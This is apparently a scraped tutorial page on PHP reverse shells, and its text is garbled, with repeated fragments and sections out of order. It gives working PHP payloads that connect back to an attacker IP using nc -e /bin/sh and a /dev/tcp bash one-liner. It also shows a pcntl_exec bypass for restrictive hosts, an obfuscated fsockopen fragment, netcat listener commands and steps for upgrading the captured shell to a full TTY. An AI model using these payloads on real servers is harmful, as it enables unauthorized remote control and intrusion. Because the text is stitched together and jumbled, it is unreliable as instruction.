The simple script might not work on all systems due to differences in the nc command or its location. A more universally compatible version can be:
<?php
$ip = 'your_attacker_ip_address'; // Change this to your IP
$port = 4444;
$p = popen("nc $ip $port -e /bin/sh", "w");
if (!$p)
die("Failed to create process");
?>
On your attacking machine (Kali Linux or any VPS), you need a listener.
nc -lvnp 4444
Modern hosting providers often disable dangerous PHP functions like exec, shell_exec, passthru, and system in the php.ini file.
If you try the standard shells and get errors (or silence), check phpinfo() to see what is disabled. If standard functions are blocked, you can often bypass this using the PCNTL extension. reverse shell php top
The PCNTL Bypass:
If pcntl_exec is enabled, you can fork a process to execute bash directly. This is a common bypass for restrictive environments.
<?php
pcntl_exec("/bin/bash", Array("-c", "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"));
?>
So you caught your PHP reverse shell. It’s ugly. It doesn't have tab completion, text editors like nano won't work, and you can't use su. You have a "dumb" shell.
The Python Upgrade Trick: Most Linux servers have Python installed. Run this command immediately after catching the shell to get a fully interactive TTY: The simple script might not work on all
python -c 'import pty;pty.spawn("/bin/bash")'
Then, press Ctrl+Z to background the shell. On your local machine, type:
stty raw -echo
fg
Finally, type export TERM=xterm. You now have a fully functional shell with arrow keys, tab completion, and text editors.
Sometimes, for simplicity and evasion, a one-liner is used: On your attacking machine (Kali Linux or any
<?php exec("nc your_attacker_ip_address 4444 -e /bin/sh"); ?>
A PHP reverse shell is a script written in PHP that, when executed on a server, initiates a TCP or UDP connection back to an attacker's machine, granting remote command-line access. Unlike bind shells (which listen on a local port), reverse shells bypass many inbound firewall rules because the connection originates from the internal network.
Before running the PHP script on the target machine, you need to set up a listener on your machine. Open a terminal and use nc (netcat) to listen on a specific port:
nc -l -p 4444
$f = "fso"."ckop"."en";
$s = $f($ip, $port);